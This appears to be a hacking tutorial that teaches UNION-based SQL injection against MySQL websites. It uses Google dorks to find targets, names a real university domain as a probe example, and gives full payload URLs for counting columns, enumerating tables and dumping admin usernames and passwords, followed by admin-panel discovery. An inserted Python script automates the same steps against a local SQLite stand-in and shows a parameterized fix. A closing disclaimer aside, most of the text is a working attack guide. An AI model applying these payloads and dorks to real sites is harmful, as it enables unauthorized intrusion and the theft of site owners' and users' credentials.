What can an attacker do with a SQL injection attack?
* Bypass logins
* Read confidential data
* Modify the contents of the website
* Shut down the MySQL server
So, here we go.
Step 1: Finding a Vulnerable Website
To find candidate sites you can use Google dorks, search strings that match URLs taking a numeric parameter.
Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
Much longer lists of Google dorks are published online.
After picking a dork, paste it into Google and you will see lots of sites. Open these sites one by one to check for the vulnerability.
Note
If you want to test a particular website, restrict the search to it:
site:www.victimsite.com dork_list_commands
For example:
site:www.victimsite.com inurl:index.php?id=
Step 2: Checking the Vulnerability
To check whether a site is vulnerable, simply put ' at the end of the URL, like this:
www.du.ac.in/index.php?id=4'
If you get an error like the following, the site is vulnerable:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
A site that shows no error is not necessarily safe; it may simply hide database errors, in which case you need blind techniques that this tutorial does not cover.
Step 3: Finding the Number of Columns
Our next step is to find the number of columns in the query the page runs against the target database (a UNION only works when both sides select the same number of columns).
For that, replace the single quote (') with an "order by n" statement.
Change n from 1, 2, 3, 4, 5, 6, ... until you get an error like "Unknown column 'n' in 'order clause'".
For example:
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
If you get the error at the "x"th number, then the number of columns is "x-1".
I mean:
http://www.victimsite.com/index.php?id=2 order by 1 (no error)
http://www.victimsite.com/index.php?id=2 order by 2 (no error)
http://www.victimsite.com/index.php?id=2 order by 3 (no error)
http://www.victimsite.com/index.php?id=2 order by 4 (no error)
http://www.victimsite.com/index.php?id=2 order by 5 (no error)
http://www.victimsite.com/index.php?id=2 order by 6 (no error)
http://www.victimsite.com/index.php?id=2 order by 7 (no error)
http://www.victimsite.com/index.php?id=2 order by 8 (error)
So here x=8, and the number of columns is x-1, i.e. 7.
In case the above method does not work for you, add "--" at the end of the statement. It starts a MySQL comment, so whatever the application appends to the query (a quote, an ORDER BY, a LIMIT) is ignored. MySQL requires a space after "--", which is why you will often see "--+" or "-- -" in URL payloads.
For example:
http://www.victimsite.com/index.php?id=2 order by 1--
Step 4: Finding the Vulnerable Columns
Now find which columns are actually displayed on the page (the "vulnerable" columns) by trying the query "union select columns_sequence".
For example, if the number of columns is 7, the query is as follows:
http://www.victimsite.com/index.php?id=2 union select 1,2,3,4,5,6,7--
If the above shows only the normal page, use a negative id (or "and 1=2") so that the original row matches nothing and only the union row is displayed:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
The page now prints some of the numbers in place of its normal content. Say it prints 3 and 7: that tells us columns 3 and 7 are displayed and can be used to extract data.
Let us take the first vulnerable column, 3. We inject our query into this column.
Step 5: Finding the Version, Database and User
Replace the 3 in the query with "version()".
For example:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--
Now it will display the version, such as 5.0.1 or 4.3.x.
Replace version() with database() and user() to find the current database name and the database user the application connects as.
For example:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--
If the above does not work (version() output sometimes trips a collation error), try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--
Step 6: Finding the Table Names
This step relies on information_schema, which exists if the MySQL version is 5 or above.
If the version is 4.x, information_schema is not available and you have to guess the table names (blind SQL injection).
Let us list the tables of the current database. Replace the 3 with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()".
For example:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
Now it will display the list of table names. Find the table name related to the admin or user accounts.
Let us choose the "admin" table.
Step 7: Finding the Column Names
Now replace "group_concat(table_name)" with "group_concat(column_name)".
Replace "from information_schema.tables where table_schema=database()--" with "from information_schema.columns where table_name=mysqlchar--".
We have to write the table name as a MySQL CHAR() string so the payload contains no quote characters, which the application may escape or strip.
Install the HackBar add-on:
Once you have installed the add-on, you will see a toolbar below the address bar. If you cannot see the HackBar, press F9.
Select SQL -> MySQL -> MySQL CHAR() in the HackBar.
It will ask you to enter the string you want to convert to CHAR(). We want to convert the table name; in our case the table name is 'admin'.
Now you can see CHAR(numbers separated with commas) in the HackBar; each number is the ASCII code of one character of the name.
Copy and paste it into the URL in place of "mysqlchar".
For example:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
The above query will display the list of columns.
For example: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password, etc.
Now replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2). 0x3a is the hex literal for ':' and only separates the two values in the output.
Then replace "from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with "from table_name".
For example:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--
If the above query gives an "Unknown column" error, try another column name from the list.
If we are lucky, it will display the data stored in the database for the columns you chose. For instance, the username and password columns will display the login credentials stored in the database.
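The whole procedure from Step 2 through Step 7, as an added worked example that is not part of the original tutorial: a Python script that builds a tiny throwaway SQLite database standing in for the target (constructed sample data, not a real site), exposes the same concatenated "index.php?id=" query the tutorial attacks, and automates the quote probe, the ORDER BY column count, the UNION marker discovery and the data extraction. SQLite is used so it runs offline with nothing to install; comments mark where the tutorial's MySQL syntax (version(), information_schema, the three-argument group_concat) is replaced by a SQLite equivalent. The names build_db, vulnerable_page, safe_page and run_attack are this example's own. A parameterized safe_page is included so you can watch the same payloads fail against the fix.

```python
import re
import sqlite3

# Constructed stand-in for the tutorial's target (sample data, not a real site):
# an "articles" table the page renders and an "admin" table holding credentials.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles(id INTEGER, title TEXT, body TEXT, author TEXT,
                              created TEXT, tags TEXT, views INTEGER);
        INSERT INTO articles VALUES(2,'Hello','Welcome','alice','2010-01-01','news',10);
        CREATE TABLE admin(admin_id INTEGER, admin_password TEXT);
        INSERT INTO admin VALUES(1,'s3cret'),(2,'hunter2');
    """)
    return db

COLS = "id, title, body, author, created, tags, views"   # 7 columns, as in the tutorial

def render(rows):
    # The page prints only columns 3 (body) and 7 (views); the others never reach the HTML,
    # which is why only some positions of a UNION SELECT 1,2,...,7 show up (Step 4).
    return "".join(f'<div class="body">{r[2]}</div><div class="views">{r[6]}</div>' for r in rows)

def vulnerable_page(db, id_param):
    """index.php?id=<value> built by string concatenation: the flaw the tutorial exploits."""
    return render(db.execute(f"SELECT {COLS} FROM articles WHERE id=" + id_param).fetchall())

def safe_page(db, id_param):
    """Hardened form: the value is bound as a parameter, never spliced into the SQL text."""
    return render(db.execute(f"SELECT {COLS} FROM articles WHERE id=?", (id_param,)).fetchall())

def probe_quote(page, db):
    """Step 2: a lone quote that raises a database error shows the input reaches the query."""
    try:
        page(db, "4'")
        return False
    except sqlite3.OperationalError:
        return True

def count_columns(page, db, max_cols=20):
    """Step 3: ORDER BY n succeeds while n <= column count; the first failing n gives n-1."""
    for n in range(1, max_cols + 1):
        try:
            page(db, f"2 ORDER BY {n}--")
        except sqlite3.OperationalError:
            return n - 1
    return None

def union_payload(ncols, **override):
    """'1,2,...,n' with chosen positions (c3=..., c7=...) swapped for expressions (Steps 4-7)."""
    return ",".join(override.get(f"c{i}", str(i)) for i in range(1, ncols + 1))

def find_reflected_columns(page, db, ncols):
    """Step 4: id=-2 matches no row, so whichever markers print are the displayed columns."""
    html = page(db, "-2 UNION SELECT " + union_payload(ncols) + "--")
    return [i for i in range(1, ncols + 1) if re.search(rf"(?<!\d){i}(?!\d)", html)]

def to_mysql_char(name):
    """Step 7: spell a table name as CHAR(...) so the payload needs no quote characters."""
    return "CHAR(" + ",".join(str(ord(ch)) for ch in name) + ")"

def extract(page, db, ncols, col, expr, from_clause=""):
    """Inject `expr` in displayed column `col` and read back what the page printed there."""
    base = re.findall(r">([^<]+)<", page(db, "-2 UNION SELECT " + union_payload(ncols) + "--"))
    payload = union_payload(ncols, **{f"c{col}": expr})
    got = re.findall(r">([^<]+)<", page(db, f"-2 UNION SELECT {payload} {from_clause}--"))
    # The slot that showed the bare marker in the baseline now holds the injected value.
    return next((g for b, g in zip(base, got) if b == str(col)), None)

def run_attack(page):
    """Steps 2-7 end to end; returns None when the quote probe shows no injection."""
    db = build_db()
    if not probe_quote(page, db):
        return None
    n = count_columns(page, db)
    col = find_reflected_columns(page, db, n)[0]   # column 3 in this layout
    # SQLite stand-ins for the MySQL calls in the tutorial: sqlite_version() for version(),
    # sqlite_master for information_schema.tables/.columns, and '||' with char(58) for the
    # three-argument group_concat(a,0x3a,b) (SQLite's group_concat takes at most two).
    return {
        "columns": n,
        "version": extract(page, db, n, col, "sqlite_version()"),
        "tables": extract(page, db, n, col, "group_concat(name)",
                          "FROM sqlite_master WHERE type=" + to_mysql_char("table")),
        "admin_ddl": extract(page, db, n, col, "group_concat(sql)",
                             "FROM sqlite_master WHERE name=" + to_mysql_char("admin")),
        "creds": extract(page, db, n, col, "group_concat(admin_id||char(58)||admin_password)",
                         "FROM admin"),
    }

if __name__ == "__main__":
    print(run_attack(vulnerable_page))   # credentials dumped
    print(run_attack(safe_page))         # None: parameter binding defeats every payload
```

Against vulnerable_page the script ends with "1:s3cret,2:hunter2", the same admin_id:admin_password dump as the tutorial's last query; against safe_page the quote probe never errors and nothing else is reachable, because the whole payload is bound as the value of id instead of becoming SQL.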
Step 8: Finding the Admin Panel
Just try URLs like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
If you are lucky, you will find the admin page at one of the above URLs, or you can use some kind of admin-finder tool.
Warning:
The above post is for educational purposes only. Never attempt to follow the above steps against third-party websites. If you want to learn the SQL injection attack method, you can do so in a safe environment by setting up your own lab.
Hope you liked the tutorial.